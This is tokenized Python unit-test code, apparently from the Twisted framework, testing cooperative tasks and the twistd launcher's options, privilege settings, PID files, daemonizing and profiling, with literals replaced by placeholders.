( len ( self . work ) , <NUM_LIT:1> ) <EOL> self . work [ <NUM_LIT:0> ] . callback ( "<STR_LIT>" ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( self . 
work ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( self . work [ <NUM_LIT:1> ] , <NUM_LIT:2> ) <EOL> def test_whenDone ( self ) : <EOL> """<STR_LIT>""" <EOL> deferred1 = self . task . whenDone ( ) <EOL> deferred2 = self . task . whenDone ( ) <EOL> results1 = [ ] <EOL> results2 = [ ] <EOL> final1 = [ ] <EOL> final2 = [ ] <EOL> def callbackOne ( result ) : <EOL> results1 . append ( result ) <EOL> return <NUM_LIT:1> <EOL> def callbackTwo ( result ) : <EOL> results2 . append ( result ) <EOL> return <NUM_LIT:2> <EOL> deferred1 . addCallback ( callbackOne ) <EOL> deferred2 . addCallback ( callbackTwo ) <EOL> deferred1 . addCallback ( final1 . append ) <EOL> deferred2 . addCallback ( final2 . append ) <EOL> self . stopNext ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( results1 ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( results2 ) , <NUM_LIT:1> ) <EOL> self . assertIdentical ( results1 [ <NUM_LIT:0> ] , self . task . _iterator ) <EOL> self . assertIdentical ( results2 [ <NUM_LIT:0> ] , self . task . _iterator ) <EOL> self . assertEqual ( final1 , [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( final2 , [ <NUM_LIT:2> ] ) <EOL> def test_whenDoneError ( self ) : <EOL> """<STR_LIT>""" <EOL> deferred1 = self . task . whenDone ( ) <EOL> results = [ ] <EOL> deferred1 . addErrback ( results . append ) <EOL> self . dieNext ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( results ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( results [ <NUM_LIT:0> ] . check ( UnhandledException ) , UnhandledException ) <EOL> def test_whenDoneStop ( self ) : <EOL> """<STR_LIT>""" <EOL> deferred1 = self . task . whenDone ( ) <EOL> errors = [ ] <EOL> deferred1 . addErrback ( errors . append ) <EOL> self . task . stop ( ) <EOL> self . assertEqual ( len ( errors ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( errors [ <NUM_LIT:0> ] . check ( task . TaskStopped ) , task . 
TaskStopped ) <EOL> def test_whenDoneAlreadyDone ( self ) : <EOL> """<STR_LIT>""" <EOL> self . stopNext ( ) <EOL> self . scheduler . pump ( ) <EOL> results = [ ] <EOL> self . task . whenDone ( ) . addCallback ( results . append ) <EOL> self . assertEqual ( results , [ self . task . _iterator ] ) <EOL> def test_stopStops ( self ) : <EOL> """<STR_LIT>""" <EOL> self . task . stop ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( self . work ) , <NUM_LIT:0> ) <EOL> self . assertRaises ( task . TaskStopped , self . task . stop ) <EOL> self . assertRaises ( task . TaskStopped , self . task . pause ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ ] ) <EOL> def test_pauseStopResume ( self ) : <EOL> """<STR_LIT>""" <EOL> self . task . pause ( ) <EOL> self . task . stop ( ) <EOL> self . task . resume ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ ] ) <EOL> def test_stopDeferred ( self ) : <EOL> """<STR_LIT>""" <EOL> self . deferNext ( ) <EOL> self . scheduler . pump ( ) <EOL> d = self . work . pop ( ) <EOL> self . assertEqual ( self . task . _pauseCount , <NUM_LIT:1> ) <EOL> results = [ ] <EOL> d . addBoth ( results . append ) <EOL> self . scheduler . pump ( ) <EOL> self . task . stop ( ) <EOL> self . scheduler . pump ( ) <EOL> d . callback ( <NUM_LIT:7> ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( results , [ None ] ) <EOL> self . assertEqual ( self . work , [ ] ) <EOL> def test_stopExhausted ( self ) : <EOL> """<STR_LIT>""" <EOL> self . stopNext ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertRaises ( task . TaskDone , self . task . stop ) <EOL> def test_stopErrored ( self ) : <EOL> """<STR_LIT>""" <EOL> self . dieNext ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertRaises ( task . TaskFailed , self . task . 
stop ) <EOL> def test_stopCooperatorReentrancy ( self ) : <EOL> """<STR_LIT>""" <EOL> callbackPhases = [ ] <EOL> def stopit ( result ) : <EOL> callbackPhases . append ( result ) <EOL> self . cooperator . stop ( ) <EOL> callbackPhases . append ( "<STR_LIT>" ) <EOL> self . task . whenDone ( ) . addCallback ( stopit ) <EOL> self . stopNext ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( callbackPhases , [ self . task . _iterator , "<STR_LIT>" ] ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division <EOL> import errno <EOL> import inspect <EOL> import signal <EOL> import os <EOL> import sys <EOL> try : <EOL> import pwd <EOL> import grp <EOL> except ImportError : <EOL> pwd = grp = None <EOL> try : <EOL> import cPickle as pickle <EOL> except ImportError : <EOL> import pickle <EOL> from zope . interface import implementer <EOL> from zope . interface . verify import verifyObject <EOL> from twisted . trial import unittest <EOL> from twisted . test . test_process import MockOS <EOL> from twisted import plugin , logger <EOL> from twisted . application . service import IServiceMaker <EOL> from twisted . application import service , app , reactors <EOL> from twisted . scripts import twistd <EOL> from twisted . python . compat import NativeStringIO <EOL> from twisted . python . usage import UsageError <EOL> from twisted . python . log import ( ILogObserver as LegacyILogObserver , <EOL> textFromEventDict ) <EOL> from twisted . python . components import Componentized <EOL> from twisted . internet . defer import Deferred <EOL> from twisted . internet . interfaces import IReactorDaemonize <EOL> from twisted . internet . test . modulehelpers import AlternateReactor <EOL> from twisted . python . fakepwd import UserDatabase <EOL> from twisted . logger import globalLogBeginner , globalLogPublisher , ILogObserver <EOL> try : <EOL> from twisted . scripts import _twistd_unix <EOL> except ImportError : <EOL> _twistd_unix = None <EOL> else : <EOL> from twisted . scripts . _twistd_unix import UnixApplicationRunner <EOL> from twisted . scripts . _twistd_unix import UnixAppLogger <EOL> try : <EOL> from twisted . 
python import syslog <EOL> except ImportError : <EOL> syslog = None <EOL> try : <EOL> import profile <EOL> except ImportError : <EOL> profile = None <EOL> try : <EOL> import pstats <EOL> import cProfile <EOL> except ImportError : <EOL> cProfile = None <EOL> if getattr ( os , '<STR_LIT>' , None ) is None : <EOL> setuidSkip = "<STR_LIT>" <EOL> else : <EOL> setuidSkip = None <EOL> def patchUserDatabase ( patch , user , uid , group , gid ) : <EOL> """<STR_LIT>""" <EOL> pwent = pwd . getpwuid ( os . getuid ( ) ) <EOL> grent = grp . getgrgid ( os . getgid ( ) ) <EOL> database = UserDatabase ( ) <EOL> database . addUser ( <EOL> user , pwent . pw_passwd , uid , pwent . pw_gid , <EOL> pwent . pw_gecos , pwent . pw_dir , pwent . pw_shell ) <EOL> def getgrnam ( name ) : <EOL> result = list ( grent ) <EOL> result [ result . index ( grent . gr_name ) ] = group <EOL> result [ result . index ( grent . gr_gid ) ] = gid <EOL> result = tuple ( result ) <EOL> return { group : result } [ name ] <EOL> patch ( pwd , "<STR_LIT>" , database . getpwnam ) <EOL> patch ( grp , "<STR_LIT>" , getgrnam ) <EOL> class MockServiceMaker ( object ) : <EOL> """<STR_LIT>""" <EOL> tapname = '<STR_LIT>' <EOL> def makeService ( self , options ) : <EOL> """<STR_LIT>""" <EOL> self . options = options <EOL> self . service = service . Service ( ) <EOL> return self . service <EOL> class CrippledAppLogger ( app . AppLogger ) : <EOL> """<STR_LIT>""" <EOL> def start ( self , application ) : <EOL> pass <EOL> class CrippledApplicationRunner ( twistd . _SomeApplicationRunner ) : <EOL> """<STR_LIT>""" <EOL> loggerFactory = CrippledAppLogger <EOL> def preApplication ( self ) : <EOL> pass <EOL> def postApplication ( self ) : <EOL> pass <EOL> class ServerOptionsTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_subCommands ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakePlugin ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . tapname = name <EOL> self . 
_options = '<STR_LIT>' + name <EOL> self . description = '<STR_LIT>' + name <EOL> def options ( self ) : <EOL> return self . _options <EOL> apple = FakePlugin ( '<STR_LIT>' ) <EOL> banana = FakePlugin ( '<STR_LIT>' ) <EOL> coconut = FakePlugin ( '<STR_LIT>' ) <EOL> donut = FakePlugin ( '<STR_LIT>' ) <EOL> def getPlugins ( interface ) : <EOL> self . assertEqual ( interface , IServiceMaker ) <EOL> yield coconut <EOL> yield banana <EOL> yield donut <EOL> yield apple <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertEqual ( config . _getPlugins , plugin . getPlugins ) <EOL> config . _getPlugins = getPlugins <EOL> subCommands = config . subCommands <EOL> expectedOrder = [ apple , banana , coconut , donut ] <EOL> for subCommand , expectedCommand in zip ( subCommands , expectedOrder ) : <EOL> name , shortcut , parserClass , documentation = subCommand <EOL> self . assertEqual ( name , expectedCommand . tapname ) <EOL> self . assertEqual ( shortcut , None ) <EOL> self . assertEqual ( parserClass ( ) , expectedCommand . _options ) , <EOL> self . assertEqual ( documentation , expectedCommand . description ) <EOL> def test_sortedReactorHelp ( self ) : <EOL> """<STR_LIT>""" <EOL> class FakeReactorInstaller ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . shortName = '<STR_LIT>' + name <EOL> self . description = '<STR_LIT>' + name <EOL> apple = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> banana = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> coconut = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> donut = FakeReactorInstaller ( '<STR_LIT>' ) <EOL> def getReactorTypes ( ) : <EOL> yield coconut <EOL> yield banana <EOL> yield donut <EOL> yield apple <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertEqual ( config . _getReactorTypes , reactors . getReactorTypes ) <EOL> config . _getReactorTypes = getReactorTypes <EOL> config . messageOutput = NativeStringIO ( ) <EOL> self . assertRaises ( SystemExit , config . 
parseOptions , [ '<STR_LIT>' ] ) <EOL> helpOutput = config . messageOutput . getvalue ( ) <EOL> indexes = [ ] <EOL> for reactor in apple , banana , coconut , donut : <EOL> def getIndex ( s ) : <EOL> self . assertIn ( s , helpOutput ) <EOL> indexes . append ( helpOutput . index ( s ) ) <EOL> getIndex ( reactor . shortName ) <EOL> getIndex ( reactor . description ) <EOL> self . assertEqual ( <EOL> indexes , sorted ( indexes ) , <EOL> '<STR_LIT>' % ( <EOL> helpOutput , ) ) <EOL> def test_postOptionsSubCommandCausesNoSave ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . subCommand = '<STR_LIT>' <EOL> config . postOptions ( ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , True ) <EOL> def test_postOptionsNoSubCommandSavesAsUsual ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . postOptions ( ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , False ) <EOL> def test_listAllProfilers ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> helpOutput = str ( config ) <EOL> for profiler in app . AppProfiler . profilers : <EOL> self . assertIn ( profiler , helpOutput ) <EOL> def test_defaultUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , None ) <EOL> def test_umask ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> config . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( config [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> def test_invalidUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> self . assertRaises ( UsageError , config . parseOptions , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if _twistd_unix is None : <EOL> msg = "<STR_LIT>" <EOL> test_defaultUmask . 
skip = test_umask . skip = test_invalidUmask . skip = msg <EOL> def test_unimportableConfiguredLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> e = self . assertRaises ( <EOL> UsageError , config . parseOptions , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertTrue ( <EOL> e . args [ <NUM_LIT:0> ] . startswith ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> self . assertNotIn ( '<STR_LIT:\n>' , e . args [ <NUM_LIT:0> ] ) <EOL> def test_badAttributeWithConfiguredLogObserver ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> e = self . assertRaises ( UsageError , config . parseOptions , <EOL> [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> if sys . version_info <= ( <NUM_LIT:3> , <NUM_LIT:5> ) : <EOL> self . assertTrue ( <EOL> e . args [ <NUM_LIT:0> ] . startswith ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> else : <EOL> self . assertTrue ( <EOL> e . args [ <NUM_LIT:0> ] . startswith ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> self . assertNotIn ( '<STR_LIT:\n>' , e . args [ <NUM_LIT:0> ] ) <EOL> class TapFileTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . tapfile = self . mktemp ( ) <EOL> with open ( self . tapfile , '<STR_LIT:wb>' ) as f : <EOL> pickle . dump ( service . Application ( "<STR_LIT>" ) , f ) <EOL> def test_createOrGetApplicationWithTapFile ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config . parseOptions ( [ '<STR_LIT>' , self . tapfile ] ) <EOL> application = CrippledApplicationRunner ( <EOL> config ) . createOrGetApplication ( ) <EOL> self . assertEqual ( service . IService ( application ) . name , '<STR_LIT>' ) <EOL> class TestLoggerFactory ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , runner ) : <EOL> self . runner = runner <EOL> def start ( self , application ) : <EOL> """<STR_LIT>""" <EOL> self . runner . order . 
append ( "<STR_LIT>" ) <EOL> self . runner . hadApplicationLogObserver = hasattr ( self . runner , <EOL> '<STR_LIT>' ) <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> class TestApplicationRunner ( app . ApplicationRunner ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , options ) : <EOL> app . ApplicationRunner . __init__ ( self , options ) <EOL> self . order = [ ] <EOL> self . logger = TestLoggerFactory ( self ) <EOL> def preApplication ( self ) : <EOL> self . order . append ( "<STR_LIT>" ) <EOL> self . hadApplicationPreApplication = hasattr ( self , '<STR_LIT>' ) <EOL> def postApplication ( self ) : <EOL> self . order . append ( "<STR_LIT>" ) <EOL> self . hadApplicationPostApplication = hasattr ( self , '<STR_LIT>' ) <EOL> class ApplicationRunnerTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> config = twistd . ServerOptions ( ) <EOL> self . serviceMaker = MockServiceMaker ( ) <EOL> config . loadedPlugins = { '<STR_LIT>' : self . serviceMaker } <EOL> config . subOptions = object ( ) <EOL> config . subCommand = '<STR_LIT>' <EOL> self . config = config <EOL> def test_applicationRunnerGetsCorrectApplication ( self ) : <EOL> """<STR_LIT>""" <EOL> arunner = CrippledApplicationRunner ( self . config ) <EOL> arunner . run ( ) <EOL> self . assertIdentical ( <EOL> self . serviceMaker . options , self . config . subOptions , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertIdentical ( <EOL> self . serviceMaker . service , <EOL> service . IService ( arunner . application ) . services [ <NUM_LIT:0> ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_preAndPostApplication ( self ) : <EOL> """<STR_LIT>""" <EOL> s = TestApplicationRunner ( self . config ) <EOL> s . run ( ) <EOL> self . assertFalse ( s . hadApplicationPreApplication ) <EOL> self . assertTrue ( s . hadApplicationPostApplication ) <EOL> self . assertTrue ( s . hadApplicationLogObserver ) <EOL> self . assertEqual ( s . 
order , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def _applicationStartsWithConfiguredID ( self , argv , uid , gid ) : <EOL> """<STR_LIT>""" <EOL> self . config . parseOptions ( argv ) <EOL> events = [ ] <EOL> class FakeUnixApplicationRunner ( twistd . _SomeApplicationRunner ) : <EOL> def setupEnvironment ( self , chroot , rundir , nodaemon , umask , <EOL> pidfile ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def shedPrivileges ( self , euid , uid , gid ) : <EOL> events . append ( ( '<STR_LIT>' , euid , uid , gid ) ) <EOL> def startReactor ( self , reactor , oldstdout , oldstderr ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def removePID ( self , pidfile ) : <EOL> pass <EOL> @ implementer ( service . IService , service . IProcess ) <EOL> class FakeService ( object ) : <EOL> processName = None <EOL> uid = None <EOL> gid = None <EOL> def setName ( self , name ) : <EOL> pass <EOL> def setServiceParent ( self , parent ) : <EOL> pass <EOL> def disownServiceParent ( self ) : <EOL> pass <EOL> def privilegedStartService ( self ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def startService ( self ) : <EOL> events . append ( '<STR_LIT>' ) <EOL> def stopService ( self ) : <EOL> pass <EOL> application = FakeService ( ) <EOL> verifyObject ( service . IService , application ) <EOL> verifyObject ( service . IProcess , application ) <EOL> runner = FakeUnixApplicationRunner ( self . config ) <EOL> runner . preApplication ( ) <EOL> runner . application = application <EOL> runner . postApplication ( ) <EOL> self . assertEqual ( <EOL> events , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , False , uid , gid ) , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_applicationStartsWithConfiguredNumericIDs ( self ) : <EOL> """<STR_LIT>""" <EOL> uid = <NUM_LIT> <EOL> gid = <NUM_LIT> <EOL> self . _applicationStartsWithConfiguredID ( <EOL> [ "<STR_LIT>" , str ( uid ) , "<STR_LIT>" , str ( gid ) ] , uid , gid ) <EOL> test_applicationStartsWithConfiguredNumericIDs . 
skip = setuidSkip <EOL> def test_applicationStartsWithConfiguredNameIDs ( self ) : <EOL> """<STR_LIT>""" <EOL> user = "<STR_LIT:foo>" <EOL> uid = <NUM_LIT> <EOL> group = "<STR_LIT:bar>" <EOL> gid = <NUM_LIT> <EOL> patchUserDatabase ( self . patch , user , uid , group , gid ) <EOL> self . _applicationStartsWithConfiguredID ( <EOL> [ "<STR_LIT>" , user , "<STR_LIT>" , group ] , uid , gid ) <EOL> test_applicationStartsWithConfiguredNameIDs . skip = setuidSkip <EOL> def test_startReactorRunsTheReactor ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = DummyReactor ( ) <EOL> runner = app . ApplicationRunner ( { <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : False } ) <EOL> runner . startReactor ( reactor , None , None ) <EOL> self . assertTrue ( <EOL> reactor . called , "<STR_LIT>" ) <EOL> class UnixApplicationRunnerSetupEnvironmentTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> unset = object ( ) <EOL> def setUp ( self ) : <EOL> self . root = self . unset <EOL> self . cwd = self . unset <EOL> self . mask = self . unset <EOL> self . daemon = False <EOL> self . pid = os . getpid ( ) <EOL> self . patch ( os , '<STR_LIT>' , lambda path : setattr ( self , '<STR_LIT:root>' , path ) ) <EOL> self . patch ( os , '<STR_LIT>' , lambda path : setattr ( self , '<STR_LIT>' , path ) ) <EOL> self . patch ( os , '<STR_LIT>' , lambda mask : setattr ( self , '<STR_LIT>' , mask ) ) <EOL> self . runner = UnixApplicationRunner ( twistd . ServerOptions ( ) ) <EOL> self . runner . daemonize = self . daemonize <EOL> def daemonize ( self , reactor ) : <EOL> """<STR_LIT>""" <EOL> self . daemon = True <EOL> self . patch ( os , '<STR_LIT>' , lambda : self . pid + <NUM_LIT:1> ) <EOL> def test_chroot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( "<STR_LIT>" , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertEqual ( self . 
root , "<STR_LIT>" ) <EOL> def test_noChroot ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertIdentical ( self . root , self . unset ) <EOL> def test_changeWorkingDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT>" , True , None , None ) <EOL> self . assertEqual ( self . cwd , "<STR_LIT>" ) <EOL> def test_daemonize ( self ) : <EOL> """<STR_LIT>""" <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , None , None ) <EOL> self . assertTrue ( self . daemon ) <EOL> def test_noDaemonize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , None ) <EOL> self . assertFalse ( self . daemon ) <EOL> def test_nonDaemonPIDFile ( self ) : <EOL> """<STR_LIT>""" <EOL> pidfile = self . mktemp ( ) <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , pidfile ) <EOL> with open ( pidfile , '<STR_LIT:rb>' ) as f : <EOL> pid = int ( f . read ( ) ) <EOL> self . assertEqual ( pid , self . pid ) <EOL> def test_daemonPIDFile ( self ) : <EOL> """<STR_LIT>""" <EOL> pidfile = self . mktemp ( ) <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , None , pidfile ) <EOL> with open ( pidfile , '<STR_LIT:rb>' ) as f : <EOL> pid = int ( f . read ( ) ) <EOL> self . assertEqual ( pid , self . pid + <NUM_LIT:1> ) <EOL> def test_umask ( self ) : <EOL> """<STR_LIT>""" <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , <NUM_LIT> , None ) <EOL> self . assertEqual ( self . mask , <NUM_LIT> ) <EOL> def test_noDaemonizeNoUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , True , None , None ) <EOL> self . 
assertIdentical ( self . mask , self . unset ) <EOL> def test_daemonizedNoUmask ( self ) : <EOL> """<STR_LIT>""" <EOL> with AlternateReactor ( FakeDaemonizingReactor ( ) ) : <EOL> self . runner . setupEnvironment ( None , "<STR_LIT:.>" , False , None , None ) <EOL> self . assertEqual ( self . mask , <NUM_LIT> ) <EOL> class UnixApplicationRunnerStartApplicationTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def test_setupEnvironment ( self ) : <EOL> """<STR_LIT>""" <EOL> options = twistd . ServerOptions ( ) <EOL> options . parseOptions ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> application = service . Application ( "<STR_LIT>" ) <EOL> self . runner = UnixApplicationRunner ( options ) <EOL> args = [ ] <EOL> def fakeSetupEnvironment ( self , chroot , rundir , nodaemon , umask , <EOL> pidfile ) : <EOL> args . extend ( ( chroot , rundir , nodaemon , umask , pidfile ) ) <EOL> self . assertEqual ( <EOL> inspect . getargspec ( self . runner . setupEnvironment ) , <EOL> inspect . getargspec ( fakeSetupEnvironment ) ) <EOL> self . patch ( UnixApplicationRunner , '<STR_LIT>' , <EOL> fakeSetupEnvironment ) <EOL> self . patch ( UnixApplicationRunner , '<STR_LIT>' , <EOL> lambda * a , ** kw : None ) <EOL> self . patch ( app , '<STR_LIT>' , lambda * a , ** kw : None ) <EOL> self . runner . startApplication ( application ) <EOL> self . assertEqual ( <EOL> args , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , True , <NUM_LIT> , '<STR_LIT>' ] ) <EOL> class UnixApplicationRunnerRemovePIDTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if _twistd_unix is None : <EOL> skip = "<STR_LIT>" <EOL> def test_removePID ( self ) : <EOL> """<STR_LIT>""" <EOL> runner = UnixApplicationRunner ( { } ) <EOL> path = self . mktemp ( ) <EOL> os . makedirs ( path ) <EOL> pidfile = os . path . 
join ( path , "<STR_LIT>" ) <EOL> open ( pidfile , "<STR_LIT:w>" ) . close ( ) <EOL> runner . removePID ( pidfile ) <EOL> self . assertFalse ( os . path . exists ( pidfile ) ) <EOL> def test_removePIDErrors ( self ) : <EOL> """<STR_LIT>""" <EOL> runner = UnixApplicationRunner ( { } ) <EOL> runner . removePID ( "<STR_LIT>" ) <EOL> errors = self . flushLoggedErrors ( OSError ) <EOL> self . assertEqual ( len ( errors ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( errors [ <NUM_LIT:0> ] . value . errno , errno . ENOENT ) <EOL> class FakeNonDaemonizingReactor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _beforeDaemonizeCalled = False <EOL> self . _afterDaemonizeCalled = False <EOL> def beforeDaemonize ( self ) : <EOL> self . _beforeDaemonizeCalled = True <EOL> def afterDaemonize ( self ) : <EOL> self . _afterDaemonizeCalled = True <EOL> def addSystemEventTrigger ( self , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> @ implementer ( IReactorDaemonize ) <EOL> class FakeDaemonizingReactor ( FakeNonDaemonizingReactor ) : <EOL> """<STR_LIT>""" <EOL> class DummyReactor ( object ) : <EOL> """<STR_LIT>""" <EOL> called = False <EOL> def run ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . called : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . called = True <EOL> class AppProfilingTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_profile ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> with open ( config [ "<STR_LIT>" ] ) as f : <EOL> data = f . read ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> if profile is None : <EOL> test_profile . 
skip = "<STR_LIT>" <EOL> def _testStats ( self , statsClass , profile ) : <EOL> out = NativeStringIO ( ) <EOL> stdout = self . patch ( sys , '<STR_LIT>' , out ) <EOL> stats = statsClass ( profile ) <EOL> stats . print_stats ( ) <EOL> stdout . restore ( ) <EOL> data = out . getvalue ( ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> self . assertIn ( "<STR_LIT>" , data ) <EOL> def test_profileSaveStats ( self ) : <EOL> """<STR_LIT>""" <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> config [ "<STR_LIT>" ] = True <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> profiler . run ( reactor ) <EOL> self . assertTrue ( reactor . called ) <EOL> self . _testStats ( pstats . Stats , config [ '<STR_LIT>' ] ) <EOL> if profile is None : <EOL> test_profileSaveStats . skip = "<STR_LIT>" <EOL> def test_withoutProfile ( self ) : <EOL> """<STR_LIT>""" <EOL> savedModules = sys . modules . copy ( ) <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> sys . modules [ "<STR_LIT>" ] = None <EOL> try : <EOL> self . assertRaises ( SystemExit , profiler . run , None ) <EOL> finally : <EOL> sys . modules . clear ( ) <EOL> sys . modules . update ( savedModules ) <EOL> def test_profilePrintStatsError ( self ) : <EOL> """<STR_LIT>""" <EOL> class ErroneousProfile ( profile . Profile ) : <EOL> def print_stats ( self ) : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> self . patch ( profile , "<STR_LIT>" , ErroneousProfile ) <EOL> config = twistd . ServerOptions ( ) <EOL> config [ "<STR_LIT>" ] = self . mktemp ( ) <EOL> config [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> profiler = app . AppProfiler ( config ) <EOL> reactor = DummyReactor ( ) <EOL> oldStdout = sys . stdout <EOL> self . assertRaises ( RuntimeError , profiler . run , reactor ) <EOL> self . assertIdentical ( sys . 
